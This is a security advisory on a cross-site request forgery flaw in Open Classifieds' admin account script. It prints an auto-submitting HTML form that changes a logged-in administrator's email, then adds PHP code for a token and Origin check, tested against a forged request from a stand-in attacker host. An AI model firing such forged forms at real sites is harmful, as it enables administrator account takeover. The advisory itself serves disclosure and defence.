Cross-site Request Forgery (CSRF) in Open Classifieds

2011-04-28T00:00:00
ID HTB22980
Type htbridge
Reporter High-Tech Bridge
Modified 2011-04-28T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Open Classifieds which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery (CSRF) in Open Classifieds
The vulnerability exists due to insufficient validation of the request origin in admin/accounts.php: the script acts on any POST request that arrives with the administrator's session cookie, regardless of which site served the form. A remote attacker can create a specially crafted page, trick a logged-in administrator into following a link to it, and modify the administrator's email address.
Exploitation example:
<form action="http://host/admin/accounts.php" method="post" name="main">
<input type="hidden" name="name" value="myaccount">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="account" value="">
<input type="hidden" name="action" value="new">
</form>
<script>
document.main.submit();
</script>
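The fix is to make the handler refuse requests that did not originate from the site's own form. The following is an added example, not code from Open Classifieds or from High-Tech Bridge: a per-session anti-CSRF token plus an Origin/Referer check, written as a self-contained PHP script. The function names, the session array layout, and the site origin http://host (taken from the advisory's placeholder) are assumptions; a real admin/accounts.php would call csrf_request_is_valid() before touching the account and emit csrf_field() inside its form.

```php
<?php
// Added example (not Open Classifieds code): a CSRF check for a form handler
// such as admin/accounts.php. Function names, the session layout and the
// site origin below are assumptions made for illustration.

declare(strict_types=1);

const SITE_ORIGIN = 'http://host'; // assumed canonical origin of the site

// Issue one random token per session and reuse it for every form in that session.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in the site's own forms; the handler verifies it.
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Accept only a POST that carries the session's token and, when the browser
// sent Origin or Referer, comes from the site itself. A page on another host
// cannot read the token (same-origin policy) and sends a foreign Origin.
function csrf_request_is_valid(array $server, array $post, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }

    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;
    }

    // Browsers send Origin on cross-site POSTs; older ones may send only Referer.
    // A value of "null" or a different scheme/host/port is rejected.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source !== null) {
        $parts = parse_url($source);
        $origin = ($parts['scheme'] ?? '') . '://' . ($parts['host'] ?? '')
            . (isset($parts['port']) ? ':' . $parts['port'] : '');
        if ($origin !== SITE_ORIGIN) {
            return false;
        }
    }

    return true;
}

// Self-check with constructed requests: the forged POST from the advisory's
// page (no token, attacker Origin) versus a POST from the site's own form.
$session = [];
$token = csrf_token($session);

$forgedPost = ['name' => 'myaccount', 'email' => 'email@example.com',
               'account' => '', 'action' => 'new'];
$forgedServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'];

$legitPost = $forgedPost + ['csrf_token' => $token];
$legitServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => SITE_ORIGIN];

var_dump(csrf_request_is_valid($forgedServer, $forgedPost, $session));
var_dump(csrf_request_is_valid($legitServer, $legitPost, $session));
```

The token check is the primary defence; the Origin/Referer comparison is a second layer that also stops a forged request when a token has leaked, but it must not be the only check, because some clients omit both headers. hash_equals() is used so that the token comparison does not leak timing information.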